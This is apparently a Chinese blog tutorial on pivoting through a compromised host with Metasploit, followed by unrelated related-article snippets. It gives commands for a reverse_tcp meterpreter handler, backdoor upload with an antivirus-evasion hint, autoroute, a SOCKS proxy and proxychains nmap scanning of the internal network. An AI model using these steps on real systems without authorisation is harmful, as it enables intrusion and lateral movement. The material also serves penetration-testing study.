利用MSF设置代理

1、介绍:

通过MSF拿到一个机器的权限后,通过MSF搭建socks代理,然后通内网。

拿到目标权限,有很多方法,比如:①ms17-010 ②补丁漏洞 ③MSF生成后门

在此直接使用MSF生成后门

MSF中有三个代理模块,分别是socks4a、socks5、socks_unc。
一般用 socks4a和socks5进行代理,socks5可以设置用户名和密码;
新版本的MSF已经整合了socks代理,在模块中模块中直接设置。

2、获取权限

在此省略前期的信息收集

(1)生成后门

(2)上传后门

可以通过哥斯拉等webshel工具上传;可以在msf中拿到权限后在kali本地生成http服务,然后wget下载(实战需根据杀软进程免杀)

(3)监听、上线MSF

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp #与后门一一对应
options

image.png

run #若是在实战情况下,一般先赋予权限,然后才能执行

image.png
讲当前会话挂起

background #挂起会话为2

image.png

3、添加路由

第一种方式:
使用代理之前,先添加路由,让MSF能到达目标机器内网。
这里socks模块是将代理设置为监听的端口(默认是1080),通过proxychains的流量都转给本地的1080端口,因为这是MSF起的监听端口,所以通过代理走的流量也都能到达内网。

# 选择代理规则
search autoroute
use 0
set sessions 5
run
route print   #打印路由

image.png
image.png
image.png
image.png
此时windows 7 内网已经能够访问,但是目前的情况刚刚满足在msf中访问内网,要想让其他应用同样访问内网,需要构建路由。

第二种方式:
获取shell,拿到第一层靶机shell后,利用命令查看网卡情况,发现有192.168.1.0/24网段
为了在kali中访问,需要设置路由
image.png

run autoroute -s 192.168.1.0/24 #去往1.0网段的代理
run autoroute -p

image.png

4、搭建socks代理

#使用socks5代理为例子

# 账号和密码可以不用设置
use auxiliary/server/socks_proxy
set SRVHOST  127.0.0.1
set SRVPORT  1080
set USERNAME root
set PASSWORD root
run

image.png

(1)端口存活探测

使用MSF模块扫描一个网段的所有端口,根据开放端口可以发现存活主机

auxiliary/scanner/portscan/tcp           #基于tcp进行端口扫描(1-10000),如果开放了端口,则说明该主机存活

image.png
image.png

或者配置proxychain.conf

vim /etc/proxychains.conf

加入新设置的代理,通过proxychains4代理操作
image.png
接着扫描下一层端口使用nmap

proxychains nmap -sT 192.168.111.2

image.png

至此利用MSF代理基本已经打通了二层

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/128383.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

k8s ingress基础

一、ingress 简介 在k8s集群中,service和pod的ip为内网ip,仅集群内部才可以访问。如果外部应用想要直接访问集群内的服务,就需要把外部请求通过负载均衡转发到service上,然后再由kube-proxy组件将其转发给后端pod。一般service可…

Centos8安装出错问题

科普介绍: CentOS 8 是一个基于 Linux 的操作系统,是 Red Hat Enterprise Linux (RHEL)的免费和开源版本。它提供了稳定、安全和可靠的基础设施,适用于服务器和桌面环境。CentOS 8 是 CentOS 系列中最新的版本&#x…

亚数受邀参加“长三角G60科创走廊量子密码应用创新联盟(中心)”启动仪式

11月8日,在第六届中国国际进口博览会2023长三角G60科创走廊高质量发展要素对接大会上,亚数信息科技(上海)有限公司CEO翟新元作为密码企业代表之一受邀参加“长三角G60科创走廊量子密码应用创新联盟(中心)”…

ios 对话框 弹框,输入对话框 普通对话框

1 普通对话框 UIAlertController* alert [UIAlertController alertControllerWithTitle:"a" message:"alert12222fdsfs" pr…

人工智能数学基础3:用Python 编程求极限

求极限,并用Python 编程求极限 使用洛必达法则来求解 利用泰勒展开的方法来求解这个极限 import sympyx sympy.Symbol(x) f (sympy.sin(x) - x * sympy.cos(x)) / (sympy.sin(x) ** 3)limit_value sympy.limit(f, x, 0) print(limit_value)

OAuth2.0和1.0的区别

OAuth2.0的最大改变就是不需要临时token了,直接authorize生成授权code,用code就可以换取accesstoken了,同时accesstoken加入过期,刷新机制,为了安全,要求第三方的授权接口必须是https的。OAuth2.0不能向下兼…

FL Studio21.2宿主软件中文免费版下载

纵观当下宿主软件市场,正值百家争鸣、百花齐放之际像Mac系统的Logic Pro X、传统宿主软件代表Cubase、录音师必备Pro Tools、后起之秀Studio One等,都在各自的领域具有极高的好评度。而在众多宿主软件中,有这么一款历久弥新且长盛不衰的独特宿…

Postman使用json提取器和正则表达式实现接口的关联

近期在复习Postman的基础知识,在小破站上跟着百里老师系统复习了一遍,也做了一些笔记,希望可以给大家一点点启发。 一)使用json提取器实现接口关联 实际项目场景,在财务信息页面,需要上传一个营业执照&…

HashMap 是怎么解决哈希冲突的?

(本文摘自mic老师面试文档) 常用数据结构基本上是面试必问的问题,比如 HashMap、LinkList、 ConcurrentHashMap 等。 关于 HashMap,有个学员私信了我一个面试题说: “HashMap 是怎么解决哈希冲突 的?” …

竞赛选题 深度学习疲劳检测 驾驶行为检测 - python opencv cnn

文章目录 0 前言1 课题背景2 相关技术2.1 Dlib人脸识别库2.2 疲劳检测算法2.3 YOLOV5算法 3 效果展示3.1 眨眼3.2 打哈欠3.3 使用手机检测3.4 抽烟检测3.5 喝水检测 4 最后 0 前言 🔥 优质竞赛项目系列,今天要分享的是 🚩 **基于深度学习加…

STM32H563烧录后无法擦除

STM32H563烧录后无法擦除,使用STM32CubeProgrammer连接后显示如下图所示。

rocksdb 中 db_bench 的使用方法

硬件要求 硬件要求如表1所示。 表1 硬件要求 项目 说明 CPU 12 * AMD Ryzen 5 5500U with Radeon Graphics 内存 DDR4 磁盘 HDD 软件要求 软件要求如表2所示。 表2 软件要求 项目 版本 说明 下载地址 CentOS 7.6 操作系统。 Download kernel 4.14.0 内核。…

DDU框架学习之路

目录 MVVM对比 DDU 数据消费者UI 数据的转换者:Domain Layer 数据图生产者/提供者 DataLayer 遵循原理: 单一数据流: Android官方推荐架构:DDU MVVM对比 M:Model 网络层 用于获取远端数据 VM:ViewModel 中间转…

Win10共享打印机,别人连接不上出现无法连接到打印机错误码0x0000011b

环境: Win10 专业版 惠普L1119 问题描述: Win10共享打印机,别人连接不上出现无法连接到打印机错误码0x0000011b 解决方案: 1.打开我这台电脑的注册表找到 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print在右侧…

Sentinel网关限流

背景 在微服务架构下,每个服务的性能都不同,为避免出现流量洪峰将服务冲垮,需要依赖限流工具来保护服务的稳定性。sentinel是阿里提供的限流工具,社区活跃,功能也很全面,包含实时监控、流控、熔断等功能。…

网络安全——

文章目录 网络安全TCP/IP与网络安全网络安全构成要素加密技术基础 网络安全 TCP/IP与网络安全 起初,TCP/IP只用于一个相对封闭的环境,之后才发展为并无太多限制、可以从远程访问更多资源的形式。因此,“安全”这个概念并没有引起人们太多的…

MySQL 8.0 如何修改密码安全策略!!!

目录 安全策略参数和常见等级:1.Mysql8.X常见安全策略参数指定密码的强度验证等级validate_password.policy 取值: 解决步骤1.登录mysql2.修改安全策略(1)语法如下:(2)修改完可以看一下: 3.改完密码策略,就可以根据自己修改的策略&#xff0c…

双十一“静悄悄”?VR购物拉满沉浸式购物体验

以往每年的双十一,都会因为电商购物狂欢而变得热闹非凡,而各大电商平台也会在这天推出各种促销活动。但是,近几年来,双十一正在变得“静悄悄”。一个原因是消费群体越发理性消费,更加重视商品本身的质量和体验&#xf…

跨境电商商城源码,支持多语言,开启全球贸易新篇章!

随着全球化的不断深入,跨境电商已经成为越来越多企业的选择。我们为您提供的跨境电商源码产品,具有强大的多语言支持功能,可轻松扩展至多个语言,助您迅速占领全球市场,实现业务的国际化发展。 一、多语言支持&#xff…

二十五、W5100S/W5500+RP2040树莓派Pico<Modebus TCP Server示例>

文章目录 1 前言2 简介2 .1 什么是Modbus TCP?2.2 Modbus TCP指令介绍2.3 请求数据过程2.4 Modbus TCP协议优点2.5 Modbus TCP应用场景 3 WIZnet以太网芯片4 Modbus TCP示例概述以及使用4.1 流程图4.2 准备工作核心4.3 连接方式4.4 主要代码概述4.5 结果演示 5 注意…